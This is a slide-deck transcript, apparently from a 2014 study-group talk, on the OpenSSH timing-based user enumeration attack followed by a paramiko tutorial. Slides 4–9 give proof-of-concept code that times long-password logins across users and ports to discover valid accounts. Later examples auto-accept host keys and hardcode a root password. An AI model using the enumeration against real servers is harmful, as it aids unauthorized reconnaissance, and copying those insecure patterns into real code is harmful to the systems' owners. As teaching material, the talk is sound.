OpenSSH User Enumeration Time-Based Attack と Python-paramiko


Upload: -togakushi

Post on 24-May-2015


TRANSCRIPT

  • 1. OpenSSH User Enumeration Time-Based Attack Python-paramiko 2014/06/17 #ssmjp @togakushi

2. 2 OSUETA OpenSSH OpenSSH-4.2~6.6 blog https://cureblog.de/2013/07/openssh-user-enumera PoC https://github.com/c0r3dump3d/osueta 2

3. 3

4. 4 PoC python-paramiko 40000

```
parse.add_argument('-l', action='store', dest='length', default='40', help='Length of the password in characters (x1000) (default 40).')
length = int(argus.length)*1000
sock.connect((host,int(port)))
para = paramiko.Transport(sock)
para.connect(username=user)
passwd = 'A'*length
para.auth_password(user,passwd)
```

5. 5

```
>>> import socket, paramiko
>>> s = socket.create_connection(('192.168.122.225',22))
>>> t = paramiko.Transport(s)
>>> t.connect(username='root')
>>> t.auth_password('root','A'*40000)
Traceback (most recent call last):
( )
AuthenticationException: Authentication failed.
```

6. 6

```
>>> import socket, paramiko
>>> s = socket.create_connection(('192.168.122.225',22))
>>> t = paramiko.Transport(s)
>>> t.connect(username='hage')
>>> t.auth_password('hage','A'*40000)
Traceback (most recent call last):
( )
AuthenticationException: Authentication failed.
```

7. 7 40000 sshd CPU 100%

[Note: the measurement above depends on the server accepting password authentication and processing a very long password. A server that disables password authentication (sshd_config `PasswordAuthentication no`) should not expose this path, and a password-auth attempt carrying tens of kilobytes, or an sshd CPU spike during failed logins, is a useful detection signal.]

8. 8

```
001: #!/usr/bin/env python
002:
003: import time
004: import paramiko
005:
006: def login(username='root', password='A'*8, port=22):
007:     ssh = paramiko.SSHClient()
008:     ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
009:
010:     s = time.time()
011:     try:
012:         ssh.connect(hostname='192.168.122.112',
013:                     port=port,
014:                     username=username,
015:                     password=password,
016:                     allow_agent=False,
017:                     )
018:     except paramiko.AuthenticationException:
019:         e = time.time()
```

9.
9 [Transcript note: listing lines 020–021 are missing from this extraction.]

```
022:
023: userlist = [
024:     'root', 'hoge', 'fuga'
025: ]
026: ports = [
027:     22,
028:     22421, 22431, 22432, 22441, 22451, 22461, 22471, 22491, 22501,
029:     22511, 22521, 22531, 22541, 22551, 22561, 22571, 22581, 22582,
030:     22591, 22601, 22611, 22621, 22622, 22631, 22641, 22651, 22661,
031: ]
032:
033: for port in ports:
034:     for user in userlist:
035:         s,e = login(user, 'A'*40000, port)
036:         print 'port:%-5d user:%s time:%f' % (port, user, e - s)
037:     print '-' * 40
```

10. 10 paramiko

11. 11 paramiko Python SSH2

```
sudo pip install paramiko
sudo apt-get install python-paramiko
```

Python SSH

12. 12 SSH .ssh/known_hosts

```
>>> import paramiko
>>> ssh = paramiko.SSHClient()
>>> ssh.connect('192.168.122.112')
Traceback (most recent call last):
( )
SSHException: Server '192.168.122.112' not found in known_hosts
>>> ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
>>> ssh.connect('192.168.122.112')
>>>
```

[Note: AutoAddPolicy accepts and stores whatever key an unknown host presents, so it gives no protection against a man-in-the-middle on that first connection. Where the host key is already known, load it as on slide 13 and keep paramiko's default RejectPolicy.]

13. 13 SSH known_hosts

```
>>> import paramiko
>>> ssh = paramiko.SSHClient()
>>> ssh.load_system_host_keys()
>>> ssh.connect('192.168.122.112')
>>>
```

```
>>> import paramiko
>>> ssh = paramiko.SSHClient()
>>> ssh.load_host_keys('.ssh/known_hosts')
>>> ssh.connect('192.168.122.112')
>>>
```

14. 14 / / ...

```
>>> ssh.connect('192.168.122.112')
>>> keys = ssh.get_host_keys()
>>> keys.items()
[('192.168.122.112', )]
```

15. 15 SSH /

```
> ssh-add -l
2048 e0:e6:03:ff:f7:cd:95:07:11:f8:a9:52:e8:79:e3:de .ssh/id_rsa_root (RSA)
> python
>>> import paramiko
>>> ':'.join(['%02x'%i for i in map(ord, paramiko.Agent().get_keys()[0].get_fingerprint())])
'e0:e6:03:ff:f7:cd:95:07:11:f8:a9:52:e8:79:e3:de'
```

16. 16 SSH

```
>>> import paramiko
>>> ssh = paramiko.SSHClient()
>>> ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
>>> ssh.connect('192.168.122.112')
>>> i, o, e = ssh.exec_command('ls')
>>> o.readlines()
['anaconda-ks.cfg\n', 'openssh-server\n', 'openssl\n']
>>> i, o, e = ssh.exec_command('ls2')
>>> o.readlines()
[]
>>> e.readlines()
['bash: ls2: command not found\n']
>>> ssh.close()
```

17.
17 paramiko SSH / cron etc...

18. 18 connect

- hostname (str) the server to connect to
- port (int) the server port to connect to
- username (str) the username to authenticate as (defaults to the current local username)
- password (str) a password to use for authentication or for unlocking a private key
- pkey (.PKey) an optional private key to use for authentication
- key_filename (str) the filename, or list of filenames, of optional private key(s) to try for authentication
- timeout (float) an optional timeout (in seconds) for the TCP connect
- allow_agent (bool) set to False to disable connecting to the SSH agent
- look_for_keys (bool) set to False to disable searching for discoverable private key files in ~/.ssh/
- compress (bool) set to True to turn on compression
- sock (socket) an open socket or socket-like object (such as a Channel) to use for communication to the target host

19. 19 SFTP connect open_sftp SCP

```
>>> import paramiko
>>> ssh = paramiko.SSHClient()
>>> ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
>>> ssh.connect('192.168.122.112')
>>> sftp = ssh.open_sftp()
>>> sftp.get(remorefile, localfile)
>>> sftp.close()
>>> ssh.close()
```

20. 20 ( ) sftp.chdir sftp.chmod sftp.chown sftp.close sftp.file sftp.get sftp.getcwd sftp.getfo sftp.listdir sftp.logger sftp.lstat sftp.mkdir sftp.open sftp.put sftp.putfo sftp.readlink sftp.remove sftp.rename sftp.rmdir sftp.sock sftp.stat sftp.symlink sftp.truncate sftp.unlink sftp.utime

21. 21

```
>>> import paramiko
>>> conf = paramiko.SSHConfig()
>>> conf.parse(open('.ssh/config'))
>>> conf.lookup('kvm01')
{'permitlocalcommand': 'yes', 'gatewayports': 'no', 'serveraliveinterval': '300', 'serveralivecountmax': '3', 'hostname': '192.168.1.11', 'hashknownhosts': 'no', 'escapechar': '?', 'controlpath': '~/tmp/.ssh/ControlMaster-togakushi-192.168.1.11.22', 'tcpkeepalive': 'no', 'controlmaster': 'auto', 'controlpersist': '3'}
```

22.
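22 df

```
> cat dhchk.py
#!/usr/bin/env python
import re, paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('192.168.122.112', username='root', password='password')
i, o, e = ssh.exec_command('df -P')
for line in o.readlines():
    r = line.split()
    if re.match('^/$', r[5]):
        if int(r[4].replace('%', '')) > 50:
            print '[Warning capacity over] mounted:%s Used:%s(%s)' %(r[5], r[3], r[4])
> ./dhchk.py
[Warning capacity over] mounted:/ Used:3541196(52%)
```

[Note: this example embeds the root password in the script and auto-accepts the host key. For an unattended check like this one, key-based authentication with a restricted account and a pinned host key (load_system_host_keys / load_host_keys) avoids leaving a root credential in a readable file.]

23. 23 paramiko ssh remotehost command

24. 24 close()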